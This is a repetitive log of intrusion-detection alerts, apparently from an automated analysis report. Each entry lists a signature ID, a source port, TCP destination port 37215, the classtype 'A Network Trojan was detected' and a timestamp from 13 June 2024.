              SID:2829579
              Source Port:48978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180214
              SID:2835222
              Source Port:50502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246570
              SID:2829579
              Source Port:50100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759307
              SID:2829579
              Source Port:58764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608435
              SID:2835222
              Source Port:56332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696269
              SID:2829579
              Source Port:54432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176264
              SID:2835222
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674487
              SID:2829579
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677031
              SID:2835222
              Source Port:58162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629333
              SID:2835222
              Source Port:51968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248243
              SID:2835222
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415920
              SID:2835222
              Source Port:37492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632464
              SID:2835222
              Source Port:43242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887378
              SID:2829579
              Source Port:56830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247605
              SID:2835222
              Source Port:56940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612129
              SID:2829579
              Source Port:37116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306730
              SID:2835222
              Source Port:39972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546039
              SID:2835222
              Source Port:58188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131350
              SID:2829579
              Source Port:56688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177887
              SID:2835222
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503280
              SID:2829579
              Source Port:39204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729852
              SID:2829579
              Source Port:46284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509868
              SID:2835222
              Source Port:57448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153133
              SID:2835222
              Source Port:53878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358139
              SID:2835222
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055796
              SID:2835222
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438941
              SID:2829579
              Source Port:53576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634555
              SID:2835222
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726578
              SID:2835222
              Source Port:48010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784265
              SID:2835222
              Source Port:39900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170917
              SID:2835222
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936119
              SID:2835222
              Source Port:40172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.950146
              SID:2829579
              Source Port:43064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991001
              SID:2835222
              Source Port:55306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887769
              SID:2835222
              Source Port:33810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488777
              SID:2829579
              Source Port:48024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527965
              SID:2829579
              Source Port:37758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039570
              SID:2829579
              Source Port:59426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867672
              SID:2835222
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058461
              SID:2835222
              Source Port:60876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300615
              SID:2829579
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404235
              SID:2835222
              Source Port:58614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406087
              SID:2829579
              Source Port:41974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994260
              SID:2835222
              Source Port:33534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309844
              SID:2835222
              Source Port:60276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091820
              SID:2829579
              Source Port:48968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409002
              SID:2835222
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564239
              SID:2835222
              Source Port:59752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042778
              SID:2835222
              Source Port:59150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254035
              SID:2835222
              Source Port:45326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112174
              SID:2835222
              Source Port:54716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973710
              SID:2835222
              Source Port:43778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098631
              SID:2835222
              Source Port:46784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523779
              SID:2829579
              Source Port:58228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726634
              SID:2829579
              Source Port:58398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755698
              SID:2829579
              Source Port:57700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078537
              SID:2835222
              Source Port:42448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611281
              SID:2835222
              Source Port:42498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175471
              SID:2829579
              Source Port:45956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724563
              SID:2835222
              Source Port:55270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990606
              SID:2835222
              Source Port:58620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180448
              SID:2835222
              Source Port:56126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175752
              SID:2829579
              Source Port:57770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175884
              SID:2829579
              Source Port:60200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528194
              SID:2829579
              Source Port:45498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241147
              SID:2829579
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168882
              SID:2835222
              Source Port:53728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079592
              SID:2835222
              Source Port:51008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987385
              SID:2829579
              Source Port:48516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156569
              SID:2829579
              Source Port:42774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169994
              SID:2829579
              Source Port:51414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156467
              SID:2835222
              Source Port:48982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751359
              SID:2829579
              Source Port:49792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109838
              SID:2829579
              Source Port:44480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055392
              SID:2829579
              Source Port:35714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555596
              SID:2829579
              Source Port:42092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633777
              SID:2835222
              Source Port:44084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422316
              SID:2829579
              Source Port:54712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506404
              SID:2829579
              Source Port:43148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889334
              SID:2829579
              Source Port:60136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091813
              SID:2829579
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658463
              SID:2829579
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248367
              SID:2835222
              Source Port:34650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439590
              SID:2829579
              Source Port:50198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458123
              SID:2835222
              Source Port:56360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629752
              SID:2835222
              Source Port:56526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724457
              SID:2829579
              Source Port:51408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422547
              SID:2829579
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248633
              SID:2835222
              Source Port:41252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416242
              SID:2829579
              Source Port:33114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657624
              SID:2829579
              Source Port:48648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.986642
              SID:2835222
              Source Port:34932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949872
              SID:2829579
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025516
              SID:2829579
              Source Port:45114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160909
              SID:2829579
              Source Port:37262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224013
              SID:2829579
              Source Port:45380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131692
              SID:2835222
              Source Port:41524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196183
              SID:2835222
              Source Port:53336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709713
              SID:2835222
              Source Port:43490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075094
              SID:2829579
              Source Port:58968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078314
              SID:2829579
              Source Port:37730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975464
              SID:2829579
              Source Port:46654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832965
              SID:2835222
              Source Port:39408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550596
              SID:2835222
              Source Port:53594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180623
              SID:2829579
              Source Port:40196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094210
              SID:2835222
              Source Port:50424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214315
              SID:2835222
              Source Port:46924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988144
              SID:2835222
              Source Port:55954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402430
              SID:2835222
              Source Port:35632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631305
              SID:2835222
              Source Port:57928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670020
              SID:2835222
              Source Port:48002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937115
              SID:2835222
              Source Port:59450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670384
              SID:2829579
              Source Port:48662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544283
              SID:2835222
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199691
              SID:2835222
              Source Port:42356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976222
              SID:2835222
              Source Port:51520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211412
              SID:2829579
              Source Port:47296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378345
              SID:2829579
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509270
              SID:2829579
              Source Port:53826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253478
              SID:2829579
              Source Port:50096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376302
              SID:2829579
              Source Port:49020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349067
              SID:2829579
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697123
              SID:2835222
              Source Port:51708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456159
              SID:2829579
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134278
              SID:2829579
              Source Port:33620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564310
              SID:2835222
              Source Port:36378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786406
              SID:2829579
              Source Port:36774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046243
              SID:2829579
              Source Port:58658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243338
              SID:2835222
              Source Port:40508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344168
              SID:2835222
              Source Port:52874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547274
              SID:2835222
              Source Port:44474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372727
              SID:2835222
              Source Port:51604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572563
              SID:2829579
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168261
              SID:2835222
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456516
              SID:2835222
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223016
              SID:2829579
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054817
              SID:2829579
              Source Port:45208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422400
              SID:2829579
              Source Port:56638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044732
              SID:2835222
              Source Port:60510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914209
              SID:2829579
              Source Port:55972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941797
              SID:2829579
              Source Port:37002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405292
              SID:2829579
              Source Port:55218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100246
              SID:2829579
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346959
              SID:2829579
              Source Port:48600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216642
              SID:2835222
              Source Port:38212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676106
              SID:2835222
              Source Port:49630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230074
              SID:2835222
              Source Port:34852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157809
              SID:2835222
              Source Port:40132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127352
              SID:2835222
              Source Port:44570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567257
              SID:2829579
              Source Port:46156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254628
              SID:2829579
              Source Port:54640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991870
              SID:2829579
              Source Port:40888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988866
              SID:2835222
              Source Port:51708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669525
              SID:2835222
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678212
              SID:2835222
              Source Port:40872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914780
              SID:2835222
              Source Port:50894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017278
              SID:2835222
              Source Port:38014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077483
              SID:2835222
              Source Port:43652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347124
              SID:2829579
              Source Port:50562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780350
              SID:2835222
              Source Port:49900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696834
              SID:2829579
              Source Port:37108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487708
              SID:2829579
              Source Port:44092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012259
              SID:2829579
              Source Port:46950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165840
              SID:2829579
              Source Port:37664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758191
              SID:2835222
              Source Port:54796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614353
              SID:2835222
              Source Port:57316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729942
              SID:2835222
              Source Port:34026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728689
              SID:2829579
              Source Port:49374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133999
              SID:2829579
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485195
              SID:2835222
              Source Port:56192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215381
              SID:2835222
              Source Port:51724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175941
              SID:2829579
              Source Port:37386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129929
              SID:2829579
              Source Port:46652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486665
              SID:2835222
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440022
              SID:2835222
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456472
              SID:2829579
              Source Port:53544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042127
              SID:2829579
              Source Port:46090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109021
              SID:2829579
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568397
              SID:2829579
              Source Port:43882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262514
              SID:2835222
              Source Port:40806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913203
              SID:2829579
              Source Port:35766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502554
              SID:2829579
              Source Port:60144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726549
              SID:2835222
              Source Port:45808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110394
              SID:2829579
              Source Port:57754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552860
              SID:2835222
              Source Port:33384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656041
              SID:2829579
              Source Port:51286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088237
              SID:2829579
              Source Port:50742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304274
              SID:2835222
              Source Port:43068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503782
              SID:2829579
              Source Port:49104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194693
              SID:2835222
              Source Port:49380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347320
              SID:2835222
              Source Port:33694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502966
              SID:2835222
              Source Port:57936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555014
              SID:2829579
              Source Port:36294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503138
              SID:2835222
              Source Port:39600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256332
              SID:2829579
              Source Port:55934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632568
              SID:2829579
              Source Port:57380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611385
              SID:2829579
              Source Port:41940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438463
              SID:2835222
              Source Port:34506
              Destination Port:37215
